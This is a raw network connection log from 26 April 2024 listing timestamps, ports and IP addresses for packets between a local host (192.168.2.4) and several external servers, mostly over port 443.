Apr 26, 2024 23:16:41.607523918 CEST	49740	443	192.168.2.4	142.250.217.228
Apr 26, 2024 23:16:41.607539892 CEST	443	49740	142.250.217.228	192.168.2.4
Apr 26, 2024 23:16:41.721313953 CEST	443	49741	142.250.217.228	192.168.2.4
Apr 26, 2024 23:16:41.721388102 CEST	443	49741	142.250.217.228	192.168.2.4
Apr 26, 2024 23:16:41.721427917 CEST	443	49741	142.250.217.228	192.168.2.4
Apr 26, 2024 23:16:41.721443892 CEST	49741	443	192.168.2.4	142.250.217.228
Apr 26, 2024 23:16:41.721457005 CEST	443	49741	142.250.217.228	192.168.2.4
Apr 26, 2024 23:16:41.721499920 CEST	49741	443	192.168.2.4	142.250.217.228
Apr 26, 2024 23:16:41.721770048 CEST	443	49741	142.250.217.228	192.168.2.4
Apr 26, 2024 23:16:41.721837044 CEST	443	49741	142.250.217.228	192.168.2.4
Apr 26, 2024 23:16:41.721937895 CEST	49741	443	192.168.2.4	142.250.217.228
Apr 26, 2024 23:16:41.722394943 CEST	49741	443	192.168.2.4	142.250.217.228
Apr 26, 2024 23:16:41.722394943 CEST	49741	443	192.168.2.4	142.250.217.228
Apr 26, 2024 23:16:41.722417116 CEST	443	49741	142.250.217.228	192.168.2.4
Apr 26, 2024 23:16:41.722512007 CEST	49741	443	192.168.2.4	142.250.217.228
Apr 26, 2024 23:16:41.829200029 CEST	443	49742	142.250.217.228	192.168.2.4
Apr 26, 2024 23:16:41.829243898 CEST	443	49742	142.250.217.228	192.168.2.4
Apr 26, 2024 23:16:41.829268932 CEST	443	49742	142.250.217.228	192.168.2.4
Apr 26, 2024 23:16:41.829304934 CEST	49742	443	192.168.2.4	142.250.217.228
Apr 26, 2024 23:16:41.829333067 CEST	443	49742	142.250.217.228	192.168.2.4
Apr 26, 2024 23:16:41.829385042 CEST	49742	443	192.168.2.4	142.250.217.228
Apr 26, 2024 23:16:41.831466913 CEST	443	49742	142.250.217.228	192.168.2.4
Apr 26, 2024 23:16:41.831512928 CEST	443	49742	142.250.217.228	192.168.2.4
Apr 26, 2024 23:16:41.831681967 CEST	49742	443	192.168.2.4	142.250.217.228
Apr 26, 2024 23:16:41.835186005 CEST	49742	443	192.168.2.4	142.250.217.228
Apr 26, 2024 23:16:41.835202932 CEST	443	49742	142.250.217.228	192.168.2.4
Apr 26, 2024 23:16:42.268635035 CEST	49745	443	192.168.2.4	142.250.217.228
Apr 26, 2024 23:16:42.268676043 CEST	443	49745	142.250.217.228	192.168.2.4
Apr 26, 2024 23:16:42.268747091 CEST	49745	443	192.168.2.4	142.250.217.228
Apr 26, 2024 23:16:42.269143105 CEST	49745	443	192.168.2.4	142.250.217.228
Apr 26, 2024 23:16:42.269159079 CEST	443	49745	142.250.217.228	192.168.2.4
Apr 26, 2024 23:16:42.594599962 CEST	443	49745	142.250.217.228	192.168.2.4
Apr 26, 2024 23:16:42.596384048 CEST	49745	443	192.168.2.4	142.250.217.228
Apr 26, 2024 23:16:42.596407890 CEST	443	49745	142.250.217.228	192.168.2.4
Apr 26, 2024 23:16:42.596694946 CEST	443	49745	142.250.217.228	192.168.2.4
Apr 26, 2024 23:16:42.597004890 CEST	49745	443	192.168.2.4	142.250.217.228
Apr 26, 2024 23:16:42.597063065 CEST	443	49745	142.250.217.228	192.168.2.4
Apr 26, 2024 23:16:42.684587002 CEST	49745	443	192.168.2.4	142.250.217.228
Apr 26, 2024 23:16:47.077562094 CEST	49748	443	192.168.2.4	20.114.59.183
Apr 26, 2024 23:16:47.077605963 CEST	443	49748	20.114.59.183	192.168.2.4
Apr 26, 2024 23:16:47.077677011 CEST	49748	443	192.168.2.4	20.114.59.183
Apr 26, 2024 23:16:47.079273939 CEST	49748	443	192.168.2.4	20.114.59.183
Apr 26, 2024 23:16:47.079288960 CEST	443	49748	20.114.59.183	192.168.2.4
Apr 26, 2024 23:16:47.700568914 CEST	443	49748	20.114.59.183	192.168.2.4
Apr 26, 2024 23:16:47.700673103 CEST	49748	443	192.168.2.4	20.114.59.183
Apr 26, 2024 23:16:47.707653046 CEST	49748	443	192.168.2.4	20.114.59.183
Apr 26, 2024 23:16:47.707667112 CEST	443	49748	20.114.59.183	192.168.2.4
Apr 26, 2024 23:16:47.708058119 CEST	443	49748	20.114.59.183	192.168.2.4
Apr 26, 2024 23:16:47.875778913 CEST	49748	443	192.168.2.4	20.114.59.183
Apr 26, 2024 23:16:48.062212944 CEST	49748	443	192.168.2.4	20.114.59.183
Apr 26, 2024 23:16:48.108135939 CEST	443	49748	20.114.59.183	192.168.2.4
Apr 26, 2024 23:16:48.465774059 CEST	443	49748	20.114.59.183	192.168.2.4
Apr 26, 2024 23:16:48.465805054 CEST	443	49748	20.114.59.183	192.168.2.4
Apr 26, 2024 23:16:48.465815067 CEST	443	49748	20.114.59.183	192.168.2.4
Apr 26, 2024 23:16:48.465848923 CEST	443	49748	20.114.59.183	192.168.2.4
Apr 26, 2024 23:16:48.465869904 CEST	443	49748	20.114.59.183	192.168.2.4
Apr 26, 2024 23:16:48.465878010 CEST	443	49748	20.114.59.183	192.168.2.4
Apr 26, 2024 23:16:48.465951920 CEST	49748	443	192.168.2.4	20.114.59.183
Apr 26, 2024 23:16:48.465951920 CEST	49748	443	192.168.2.4	20.114.59.183
Apr 26, 2024 23:16:48.465972900 CEST	443	49748	20.114.59.183	192.168.2.4
Apr 26, 2024 23:16:48.466075897 CEST	49748	443	192.168.2.4	20.114.59.183
Apr 26, 2024 23:16:48.466382980 CEST	443	49748	20.114.59.183	192.168.2.4
Apr 26, 2024 23:16:48.466392994 CEST	443	49748	20.114.59.183	192.168.2.4
Apr 26, 2024 23:16:48.466470003 CEST	49748	443	192.168.2.4	20.114.59.183
Apr 26, 2024 23:16:48.466475010 CEST	443	49748	20.114.59.183	192.168.2.4
Apr 26, 2024 23:16:48.466520071 CEST	49748	443	192.168.2.4	20.114.59.183
Apr 26, 2024 23:16:48.756561041 CEST	49748	443	192.168.2.4	20.114.59.183
Apr 26, 2024 23:16:48.756587982 CEST	443	49748	20.114.59.183	192.168.2.4
Apr 26, 2024 23:16:48.756601095 CEST	49748	443	192.168.2.4	20.114.59.183
Apr 26, 2024 23:16:48.756608009 CEST	443	49748	20.114.59.183	192.168.2.4
Apr 26, 2024 23:16:48.938445091 CEST	49753	443	192.168.2.4	23.46.214.6
Apr 26, 2024 23:16:48.938483000 CEST	443	49753	23.46.214.6	192.168.2.4
Apr 26, 2024 23:16:48.938560963 CEST	49753	443	192.168.2.4	23.46.214.6
Apr 26, 2024 23:16:48.941138983 CEST	49753	443	192.168.2.4	23.46.214.6
Apr 26, 2024 23:16:48.941155910 CEST	443	49753	23.46.214.6	192.168.2.4
Apr 26, 2024 23:16:49.203288078 CEST	443	49753	23.46.214.6	192.168.2.4
Apr 26, 2024 23:16:49.203382969 CEST	49753	443	192.168.2.4	23.46.214.6
Apr 26, 2024 23:16:49.206922054 CEST	49753	443	192.168.2.4	23.46.214.6
Apr 26, 2024 23:16:49.206932068 CEST	443	49753	23.46.214.6	192.168.2.4
Apr 26, 2024 23:16:49.207607031 CEST	443	49753	23.46.214.6	192.168.2.4
Apr 26, 2024 23:16:49.242805958 CEST	49753	443	192.168.2.4	23.46.214.6
Apr 26, 2024 23:16:49.284132004 CEST	443	49753	23.46.214.6	192.168.2.4
Apr 26, 2024 23:16:49.446717024 CEST	443	49753	23.46.214.6	192.168.2.4
Apr 26, 2024 23:16:49.446907043 CEST	49753	443	192.168.2.4	23.46.214.6
Apr 26, 2024 23:16:49.446945906 CEST	443	49753	23.46.214.6	192.168.2.4
Apr 26, 2024 23:16:49.446954012 CEST	49753	443	192.168.2.4	23.46.214.6
Apr 26, 2024 23:16:49.447112083 CEST	443	49753	23.46.214.6	192.168.2.4
Apr 26, 2024 23:16:49.447141886 CEST	443	49753	23.46.214.6	192.168.2.4
Apr 26, 2024 23:16:49.447194099 CEST	49753	443	192.168.2.4	23.46.214.6
Apr 26, 2024 23:16:49.491837025 CEST	49755	443	192.168.2.4	23.46.214.6
Apr 26, 2024 23:16:49.491883993 CEST	443	49755	23.46.214.6	192.168.2.4
Apr 26, 2024 23:16:49.491961956 CEST	49755	443	192.168.2.4	23.46.214.6
Apr 26, 2024 23:16:49.492211103 CEST	49755	443	192.168.2.4	23.46.214.6
Apr 26, 2024 23:16:49.492225885 CEST	443	49755	23.46.214.6	192.168.2.4
Apr 26, 2024 23:16:49.747961044 CEST	443	49755	23.46.214.6	192.168.2.4
Apr 26, 2024 23:16:49.748024940 CEST	49755	443	192.168.2.4	23.46.214.6
Apr 26, 2024 23:16:49.750271082 CEST	49755	443	192.168.2.4	23.46.214.6
Apr 26, 2024 23:16:49.750278950 CEST	443	49755	23.46.214.6	192.168.2.4
Apr 26, 2024 23:16:49.750602007 CEST	443	49755	23.46.214.6	192.168.2.4
Apr 26, 2024 23:16:49.755868912 CEST	49755	443	192.168.2.4	23.46.214.6
Apr 26, 2024 23:16:49.800127029 CEST	443	49755	23.46.214.6	192.168.2.4
Apr 26, 2024 23:16:49.997987032 CEST	443	49755	23.46.214.6	192.168.2.4
Apr 26, 2024 23:16:49.998091936 CEST	443	49755	23.46.214.6	192.168.2.4
Apr 26, 2024 23:16:49.998143911 CEST	49755	443	192.168.2.4	23.46.214.6
Apr 26, 2024 23:16:49.998867989 CEST	49755	443	192.168.2.4	23.46.214.6
Apr 26, 2024 23:16:49.998894930 CEST	443	49755	23.46.214.6	192.168.2.4
Apr 26, 2024 23:16:49.998905897 CEST	49755	443	192.168.2.4	23.46.214.6
Apr 26, 2024 23:16:49.998912096 CEST	443	49755	23.46.214.6	192.168.2.4
Apr 26, 2024 23:16:52.479456902 CEST	80	49723	208.111.136.0	192.168.2.4
Apr 26, 2024 23:16:52.479598045 CEST	49723	80	192.168.2.4	208.111.136.0
Apr 26, 2024 23:16:52.479641914 CEST	49723	80	192.168.2.4	208.111.136.0
Apr 26, 2024 23:16:52.588001966 CEST	443	49745	142.250.217.228	192.168.2.4
Apr 26, 2024 23:16:52.588169098 CEST	443	49745	142.250.217.228	192.168.2.4
Apr 26, 2024 23:16:52.588227987 CEST	49745	443	192.168.2.4	142.250.217.228
Apr 26, 2024 23:16:52.605545044 CEST	80	49723	208.111.136.0	192.168.2.4
Apr 26, 2024 23:16:53.299000025 CEST	49745	443	192.168.2.4	142.250.217.228
Apr 26, 2024 23:16:53.299041033 CEST	443	49745	142.250.217.228	192.168.2.4
Apr 26, 2024 23:17:06.864115000 CEST	80	49724	208.111.136.0	192.168.2.4
Apr 26, 2024 23:17:06.864224911 CEST	49724	80	192.168.2.4	208.111.136.0
Apr 26, 2024 23:17:06.864273071 CEST	49724	80	192.168.2.4	208.111.136.0
Apr 26, 2024 23:17:06.990206957 CEST	80	49724	208.111.136.0	192.168.2.4
Apr 26, 2024 23:17:27.214416027 CEST	49756	443	192.168.2.4	20.114.59.183
Apr 26, 2024 23:17:27.214461088 CEST	443	49756	20.114.59.183	192.168.2.4
Apr 26, 2024 23:17:27.214543104 CEST	49756	443	192.168.2.4	20.114.59.183
Apr 26, 2024 23:17:27.214889050 CEST	49756	443	192.168.2.4	20.114.59.183
Apr 26, 2024 23:17:27.214905024 CEST	443	49756	20.114.59.183	192.168.2.4
Apr 26, 2024 23:17:27.832604885 CEST	443	49756	20.114.59.183	192.168.2.4
Apr 26, 2024 23:17:27.832726002 CEST	49756	443	192.168.2.4	20.114.59.183
Apr 26, 2024 23:17:27.838653088 CEST	49756	443	192.168.2.4	20.114.59.183
Apr 26, 2024 23:17:27.838675976 CEST	443	49756	20.114.59.183	192.168.2.4
Apr 26, 2024 23:17:27.839010000 CEST	443	49756	20.114.59.183	192.168.2.4
Apr 26, 2024 23:17:27.856120110 CEST	49756	443	192.168.2.4	20.114.59.183
Apr 26, 2024 23:17:27.900115967 CEST	443	49756	20.114.59.183	192.168.2.4
Apr 26, 2024 23:17:28.439701080 CEST	443	49756	20.114.59.183	192.168.2.4
Apr 26, 2024 23:17:28.439750910 CEST	443	49756	20.114.59.183	192.168.2.4
Apr 26, 2024 23:17:28.439774036 CEST	443	49756	20.114.59.183	192.168.2.4
Apr 26, 2024 23:17:28.439857006 CEST	49756	443	192.168.2.4	20.114.59.183
Apr 26, 2024 23:17:28.439902067 CEST	443	49756	20.114.59.183	192.168.2.4
Apr 26, 2024 23:17:28.439980030 CEST	443	49756	20.114.59.183	192.168.2.4
Apr 26, 2024 23:17:28.440088987 CEST	49756	443	192.168.2.4	20.114.59.183
Apr 26, 2024 23:17:28.440088987 CEST	49756	443	192.168.2.4	20.114.59.183
Apr 26, 2024 23:17:28.446916103 CEST	49756	443	192.168.2.4	20.114.59.183
Apr 26, 2024 23:17:28.446949959 CEST	443	49756	20.114.59.183	192.168.2.4
Apr 26, 2024 23:17:28.446983099 CEST	49756	443	192.168.2.4	20.114.59.183
Apr 26, 2024 23:17:28.446997881 CEST	443	49756	20.114.59.183	192.168.2.4
Apr 26, 2024 23:17:42.330811024 CEST	49758	443	192.168.2.4	142.250.217.228
Apr 26, 2024 23:17:42.330861092 CEST	443	49758	142.250.217.228	192.168.2.4
Apr 26, 2024 23:17:42.331033945 CEST	49758	443	192.168.2.4	142.250.217.228
Apr 26, 2024 23:17:42.333666086 CEST	49758	443	192.168.2.4	142.250.217.228
Apr 26, 2024 23:17:42.333678961 CEST	443	49758	142.250.217.228	192.168.2.4
Apr 26, 2024 23:17:42.659698963 CEST	443	49758	142.250.217.228	192.168.2.4
Apr 26, 2024 23:17:42.660151958 CEST	49758	443	192.168.2.4	142.250.217.228
Apr 26, 2024 23:17:42.660186052 CEST	443	49758	142.250.217.228	192.168.2.4
Apr 26, 2024 23:17:42.660511971 CEST	443	49758	142.250.217.228	192.168.2.4
Apr 26, 2024 23:17:42.660820007 CEST	49758	443	192.168.2.4	142.250.217.228
Apr 26, 2024 23:17:42.660885096 CEST	443	49758	142.250.217.228	192.168.2.4
Apr 26, 2024 23:17:42.704190969 CEST	49758	443	192.168.2.4	142.250.217.228
Apr 26, 2024 23:17:52.650748968 CEST	443	49758	142.250.217.228	192.168.2.4
Apr 26, 2024 23:17:52.650799036 CEST	443	49758	142.250.217.228	192.168.2.4
Apr 26, 2024 23:17:52.651240110 CEST	49758	443	192.168.2.4	142.250.217.228
Apr 26, 2024 23:17:53.300437927 CEST	49758	443	192.168.2.4	142.250.217.228
Apr 26, 2024 23:17:53.300468922 CEST	443	49758	142.250.217.228	192.168.2.4
Apr 26, 2024 23:18:10.758817911 CEST	49760	443	192.168.2.4	104.21.46.75
Apr 26, 2024 23:18:10.758862972 CEST	443	49760	104.21.46.75	192.168.2.4
Apr 26, 2024 23:18:10.759057045 CEST	49760	443	192.168.2.4	104.21.46.75
Apr 26, 2024 23:18:10.787178993 CEST	49760	443	192.168.2.4	104.21.46.75
Apr 26, 2024 23:18:10.787204981 CEST	443	49760	104.21.46.75	192.168.2.4
Apr 26, 2024 23:18:11.051161051 CEST	443	49760	104.21.46.75	192.168.2.4
Apr 26, 2024 23:18:11.051271915 CEST	49760	443	192.168.2.4	104.21.46.75
Apr 26, 2024 23:18:11.114944935 CEST	49760	443	192.168.2.4	104.21.46.75
Apr 26, 2024 23:18:11.114973068 CEST	443	49760	104.21.46.75	192.168.2.4
Apr 26, 2024 23:18:11.115386963 CEST	443	49760	104.21.46.75	192.168.2.4
Apr 26, 2024 23:18:11.115514040 CEST	49760	443	192.168.2.4	104.21.46.75
Apr 26, 2024 23:18:11.119195938 CEST	49760	443	192.168.2.4	104.21.46.75
Apr 26, 2024 23:18:11.164125919 CEST	443	49760	104.21.46.75	192.168.2.4
Apr 26, 2024 23:18:18.736192942 CEST	443	49760	104.21.46.75	192.168.2.4
Apr 26, 2024 23:18:18.736331940 CEST	443	49760	104.21.46.75	192.168.2.4
Apr 26, 2024 23:18:18.736447096 CEST	49760	443	192.168.2.4	104.21.46.75
Apr 26, 2024 23:18:18.736763954 CEST	49760	443	192.168.2.4	104.21.46.75
Apr 26, 2024 23:18:18.736799955 CEST	443	49760	104.21.46.75	192.168.2.4
Apr 26, 2024 23:18:19.896502018 CEST	49761	443	192.168.2.4	104.21.46.75
Apr 26, 2024 23:18:19.896549940 CEST	443	49761	104.21.46.75	192.168.2.4
Apr 26, 2024 23:18:19.896620989 CEST	49761	443	192.168.2.4	104.21.46.75
Apr 26, 2024 23:18:19.896956921 CEST	49761	443	192.168.2.4	104.21.46.75
Apr 26, 2024 23:18:19.896975994 CEST	443	49761	104.21.46.75	192.168.2.4
Apr 26, 2024 23:18:20.161803961 CEST	443	49761	104.21.46.75	192.168.2.4
Apr 26, 2024 23:18:20.161876917 CEST	49761	443	192.168.2.4	104.21.46.75
Apr 26, 2024 23:18:20.162432909 CEST	49761	443	192.168.2.4	104.21.46.75
Apr 26, 2024 23:18:20.162446976 CEST	443	49761	104.21.46.75	192.168.2.4
Apr 26, 2024 23:18:20.164201021 CEST	49761	443	192.168.2.4	104.21.46.75
Apr 26, 2024 23:18:20.164208889 CEST	443	49761	104.21.46.75	192.168.2.4
Apr 26, 2024 23:18:23.959305048 CEST	443	49761	104.21.46.75	192.168.2.4
Apr 26, 2024 23:18:23.959362984 CEST	443	49761	104.21.46.75	192.168.2.4
Apr 26, 2024 23:18:23.959373951 CEST	49761	443	192.168.2.4	104.21.46.75
Apr 26, 2024 23:18:23.959403038 CEST	49761	443	192.168.2.4	104.21.46.75
Apr 26, 2024 23:18:23.959589005 CEST	49761	443	192.168.2.4	104.21.46.75
Apr 26, 2024 23:18:23.959614992 CEST	443	49761	104.21.46.75	192.168.2.4
Apr 26, 2024 23:18:24.037493944 CEST	49762	443	192.168.2.4	104.21.46.75
Apr 26, 2024 23:18:24.037579060 CEST	443	49762	104.21.46.75	192.168.2.4
Apr 26, 2024 23:18:24.037650108 CEST	49762	443	192.168.2.4	104.21.46.75
Apr 26, 2024 23:18:24.037880898 CEST	49762	443	192.168.2.4	104.21.46.75
Apr 26, 2024 23:18:24.037930965 CEST	443	49762	104.21.46.75	192.168.2.4
Apr 26, 2024 23:18:24.299113035 CEST	443	49762	104.21.46.75	192.168.2.4
Apr 26, 2024 23:18:24.299226999 CEST	49762	443	192.168.2.4	104.21.46.75
Apr 26, 2024 23:18:24.299740076 CEST	49762	443	192.168.2.4	104.21.46.75
Apr 26, 2024 23:18:24.299755096 CEST	443	49762	104.21.46.75	192.168.2.4
Apr 26, 2024 23:18:24.301407099 CEST	49762	443	192.168.2.4	104.21.46.75
Apr 26, 2024 23:18:24.301414013 CEST	443	49762	104.21.46.75	192.168.2.4
Apr 26, 2024 23:18:30.589302063 CEST	443	49762	104.21.46.75	192.168.2.4
Apr 26, 2024 23:18:30.589397907 CEST	49762	443	192.168.2.4	104.21.46.75
Apr 26, 2024 23:18:30.589457989 CEST	443	49762	104.21.46.75	192.168.2.4
Apr 26, 2024 23:18:30.589492083 CEST	443	49762	104.21.46.75	192.168.2.4
Apr 26, 2024 23:18:30.589519978 CEST	49762	443	192.168.2.4	104.21.46.75
Apr 26, 2024 23:18:30.589565039 CEST	49762	443	192.168.2.4	104.21.46.75
Apr 26, 2024 23:18:30.589683056 CEST	49762	443	192.168.2.4	104.21.46.75
Apr 26, 2024 23:18:30.589714050 CEST	443	49762	104.21.46.75	192.168.2.4
Apr 26, 2024 23:18:30.651946068 CEST	49763	443	192.168.2.4	104.21.46.75
Apr 26, 2024 23:18:30.651993990 CEST	443	49763	104.21.46.75	192.168.2.4
Apr 26, 2024 23:18:30.652065992 CEST	49763	443	192.168.2.4	104.21.46.75
Apr 26, 2024 23:18:30.652307987 CEST	49763	443	192.168.2.4	104.21.46.75
Apr 26, 2024 23:18:30.652323008 CEST	443	49763	104.21.46.75	192.168.2.4
Apr 26, 2024 23:18:30.918905020 CEST	443	49763	104.21.46.75	192.168.2.4
Apr 26, 2024 23:18:30.918984890 CEST	49763	443	192.168.2.4	104.21.46.75
Apr 26, 2024 23:18:30.919486046 CEST	49763	443	192.168.2.4	104.21.46.75
Apr 26, 2024 23:18:30.919496059 CEST	443	49763	104.21.46.75	192.168.2.4
Apr 26, 2024 23:18:30.921039104 CEST	49763	443	192.168.2.4	104.21.46.75
Apr 26, 2024 23:18:30.921046019 CEST	443	49763	104.21.46.75	192.168.2.4
Apr 26, 2024 23:18:35.248549938 CEST	443	49763	104.21.46.75	192.168.2.4
Apr 26, 2024 23:18:35.248672009 CEST	443	49763	104.21.46.75	192.168.2.4
Apr 26, 2024 23:18:35.248725891 CEST	49763	443	192.168.2.4	104.21.46.75
Apr 26, 2024 23:18:35.248961926 CEST	49763	443	192.168.2.4	104.21.46.75
Apr 26, 2024 23:18:35.248961926 CEST	49763	443	192.168.2.4	104.21.46.75
Apr 26, 2024 23:18:35.276369095 CEST	49764	443	192.168.2.4	104.21.46.75
Apr 26, 2024 23:18:35.276396990 CEST	443	49764	104.21.46.75	192.168.2.4
Apr 26, 2024 23:18:35.276509047 CEST	49764	443	192.168.2.4	104.21.46.75
Apr 26, 2024 23:18:35.276757956 CEST	49764	443	192.168.2.4	104.21.46.75
Apr 26, 2024 23:18:35.276768923 CEST	443	49764	104.21.46.75	192.168.2.4
Apr 26, 2024 23:18:35.536358118 CEST	443	49764	104.21.46.75	192.168.2.4
Apr 26, 2024 23:18:35.536451101 CEST	49764	443	192.168.2.4	104.21.46.75
Apr 26, 2024 23:18:35.537085056 CEST	49764	443	192.168.2.4	104.21.46.75
Apr 26, 2024 23:18:35.537096977 CEST	443	49764	104.21.46.75	192.168.2.4
Apr 26, 2024 23:18:35.539729118 CEST	49764	443	192.168.2.4	104.21.46.75
Apr 26, 2024 23:18:35.539738894 CEST	443	49764	104.21.46.75	192.168.2.4
Apr 26, 2024 23:18:35.719490051 CEST	49763	443	192.168.2.4	104.21.46.75
Apr 26, 2024 23:18:35.719525099 CEST	443	49763	104.21.46.75	192.168.2.4
Apr 26, 2024 23:18:35.843348026 CEST	443	49764	104.21.46.75	192.168.2.4
Apr 26, 2024 23:18:35.843391895 CEST	443	49764	104.21.46.75	192.168.2.4
Apr 26, 2024 23:18:35.843420029 CEST	443	49764	104.21.46.75	192.168.2.4
Apr 26, 2024 23:18:35.843461037 CEST	443	49764	104.21.46.75	192.168.2.4
Apr 26, 2024 23:18:35.843467951 CEST	49764	443	192.168.2.4	104.21.46.75
Apr 26, 2024 23:18:35.843487978 CEST	443	49764	104.21.46.75	192.168.2.4
Apr 26, 2024 23:18:35.843508005 CEST	49764	443	192.168.2.4	104.21.46.75
Apr 26, 2024 23:18:35.843508005 CEST	49764	443	192.168.2.4	104.21.46.75
Apr 26, 2024 23:18:35.843508005 CEST	49764	443	192.168.2.4	104.21.46.75
Apr 26, 2024 23:18:35.843524933 CEST	443	49764	104.21.46.75	192.168.2.4
Apr 26, 2024 23:18:35.843537092 CEST	49764	443	192.168.2.4	104.21.46.75
Apr 26, 2024 23:18:35.843552113 CEST	443	49764	104.21.46.75	192.168.2.4
Apr 26, 2024 23:18:35.843588114 CEST	443	49764	104.21.46.75	192.168.2.4
Apr 26, 2024 23:18:35.843590975 CEST	49764	443	192.168.2.4	104.21.46.75
Apr 26, 2024 23:18:35.843590975 CEST	49764	443	192.168.2.4	104.21.46.75
Apr 26, 2024 23:18:35.843600988 CEST	443	49764	104.21.46.75	192.168.2.4
Apr 26, 2024 23:18:35.843625069 CEST	49764	443	192.168.2.4	104.21.46.75
Apr 26, 2024 23:18:35.843662024 CEST	49764	443	192.168.2.4	104.21.46.75
Apr 26, 2024 23:18:35.843966961 CEST	443	49764	104.21.46.75	192.168.2.4
Apr 26, 2024 23:18:35.844026089 CEST	443	49764	104.21.46.75	192.168.2.4
Apr 26, 2024 23:18:35.844033957 CEST	49764	443	192.168.2.4	104.21.46.75
Apr 26, 2024 23:18:35.844048023 CEST	443	49764	104.21.46.75	192.168.2.4
Apr 26, 2024 23:18:35.844058037 CEST	49764	443	192.168.2.4	104.21.46.75
Apr 26, 2024 23:18:35.844110012 CEST	49764	443	192.168.2.4	104.21.46.75
Apr 26, 2024 23:18:35.844118118 CEST	443	49764	104.21.46.75	192.168.2.4
Apr 26, 2024 23:18:35.844157934 CEST	49764	443	192.168.2.4	104.21.46.75
Apr 26, 2024 23:18:35.844749928 CEST	443	49764	104.21.46.75	192.168.2.4
Apr 26, 2024 23:18:35.844805002 CEST	443	49764	104.21.46.75	192.168.2.4
Apr 26, 2024 23:18:35.844868898 CEST	443	49764	104.21.46.75	192.168.2.4
Apr 26, 2024 23:18:35.844868898 CEST	49764	443	192.168.2.4	104.21.46.75
Apr 26, 2024 23:18:35.844876051 CEST	443	49764	104.21.46.75	192.168.2.4
Apr 26, 2024 23:18:35.844892979 CEST	49764	443	192.168.2.4	104.21.46.75
Apr 26, 2024 23:18:35.844927073 CEST	49764	443	192.168.2.4	104.21.46.75
Apr 26, 2024 23:18:35.844980001 CEST	443	49764	104.21.46.75	192.168.2.4
Apr 26, 2024 23:18:35.845065117 CEST	49764	443	192.168.2.4	104.21.46.75
Apr 26, 2024 23:18:35.846014023 CEST	443	49764	104.21.46.75	192.168.2.4
Apr 26, 2024 23:18:35.846056938 CEST	49764	443	192.168.2.4	104.21.46.75
Apr 26, 2024 23:18:35.846065044 CEST	443	49764	104.21.46.75	192.168.2.4
Apr 26, 2024 23:18:35.846111059 CEST	49764	443	192.168.2.4	104.21.46.75
Apr 26, 2024 23:18:35.846138954 CEST	443	49764	104.21.46.75	192.168.2.4
Apr 26, 2024 23:18:35.846189022 CEST	49764	443	192.168.2.4	104.21.46.75
Apr 26, 2024 23:18:35.846195936 CEST	443	49764	104.21.46.75	192.168.2.4
Apr 26, 2024 23:18:35.846268892 CEST	49764	443	192.168.2.4	104.21.46.75
Apr 26, 2024 23:18:35.846698999 CEST	443	49764	104.21.46.75	192.168.2.4
Apr 26, 2024 23:18:35.846748114 CEST	443	49764	104.21.46.75	192.168.2.4
Apr 26, 2024 23:18:35.846755028 CEST	49764	443	192.168.2.4	104.21.46.75
Apr 26, 2024 23:18:35.846760035 CEST	443	49764	104.21.46.75	192.168.2.4
Apr 26, 2024 23:18:35.846837997 CEST	49764	443	192.168.2.4	104.21.46.75
Apr 26, 2024 23:18:35.846864939 CEST	443	49764	104.21.46.75	192.168.2.4
Apr 26, 2024 23:18:35.846961021 CEST	49764	443	192.168.2.4	104.21.46.75
Apr 26, 2024 23:18:35.846986055 CEST	443	49764	104.21.46.75	192.168.2.4
Apr 26, 2024 23:18:35.847065926 CEST	49764	443	192.168.2.4	104.21.46.75
Apr 26, 2024 23:18:35.847480059 CEST	443	49764	104.21.46.75	192.168.2.4
Apr 26, 2024 23:18:35.847546101 CEST	443	49764	104.21.46.75	192.168.2.4
Apr 26, 2024 23:18:35.847573996 CEST	49764	443	192.168.2.4	104.21.46.75
Apr 26, 2024 23:18:35.847583055 CEST	443	49764	104.21.46.75	192.168.2.4
Apr 26, 2024 23:18:35.847594023 CEST	443	49764	104.21.46.75	192.168.2.4
Apr 26, 2024 23:18:35.847604990 CEST	49764	443	192.168.2.4	104.21.46.75
Apr 26, 2024 23:18:35.847624063 CEST	49764	443	192.168.2.4	104.21.46.75
Apr 26, 2024 23:18:35.848140955 CEST	49764	443	192.168.2.4	104.21.46.75
Apr 26, 2024 23:18:35.848145962 CEST	443	49764	104.21.46.75	192.168.2.4
Apr 26, 2024 23:18:35.848221064 CEST	49764	443	192.168.2.4	104.21.46.75
Apr 26, 2024 23:18:35.848356962 CEST	443	49764	104.21.46.75	192.168.2.4
Apr 26, 2024 23:18:35.848412991 CEST	49764	443	192.168.2.4	104.21.46.75
Apr 26, 2024 23:18:35.848418951 CEST	443	49764	104.21.46.75	192.168.2.4
Apr 26, 2024 23:18:35.848480940 CEST	49764	443	192.168.2.4	104.21.46.75
Apr 26, 2024 23:18:35.848506927 CEST	443	49764	104.21.46.75	192.168.2.4
Apr 26, 2024 23:18:35.848584890 CEST	49764	443	192.168.2.4	104.21.46.75
Apr 26, 2024 23:18:35.848628998 CEST	443	49764	104.21.46.75	192.168.2.4
Apr 26, 2024 23:18:35.848695040 CEST	49764	443	192.168.2.4	104.21.46.75
Apr 26, 2024 23:18:35.849235058 CEST	443	49764	104.21.46.75	192.168.2.4
Apr 26, 2024 23:18:35.849303007 CEST	443	49764	104.21.46.75	192.168.2.4
Apr 26, 2024 23:18:35.849308968 CEST	49764	443	192.168.2.4	104.21.46.75
Apr 26, 2024 23:18:35.849313974 CEST	443	49764	104.21.46.75	192.168.2.4
Apr 26, 2024 23:18:35.849344015 CEST	443	49764	104.21.46.75	192.168.2.4
Apr 26, 2024 23:18:35.849368095 CEST	49764	443	192.168.2.4	104.21.46.75
Apr 26, 2024 23:18:35.849375010 CEST	443	49764	104.21.46.75	192.168.2.4
Apr 26, 2024 23:18:35.849392891 CEST	49764	443	192.168.2.4	104.21.46.75
Apr 26, 2024 23:18:35.849422932 CEST	49764	443	192.168.2.4	104.21.46.75
Apr 26, 2024 23:18:35.850086927 CEST	443	49764	104.21.46.75	192.168.2.4
Apr 26, 2024 23:18:35.850186110 CEST	49764	443	192.168.2.4	104.21.46.75
Apr 26, 2024 23:18:35.850220919 CEST	443	49764	104.21.46.75	192.168.2.4
Apr 26, 2024 23:18:35.850271940 CEST	49764	443	192.168.2.4	104.21.46.75
Apr 26, 2024 23:18:35.968350887 CEST	443	49764	104.21.46.75	192.168.2.4
Apr 26, 2024 23:18:35.968432903 CEST	443	49764	104.21.46.75	192.168.2.4
Apr 26, 2024 23:18:35.968478918 CEST	49764	443	192.168.2.4	104.21.46.75
Apr 26, 2024 23:18:35.968496084 CEST	443	49764	104.21.46.75	192.168.2.4
Apr 26, 2024 23:18:35.968533993 CEST	49764	443	192.168.2.4	104.21.46.75
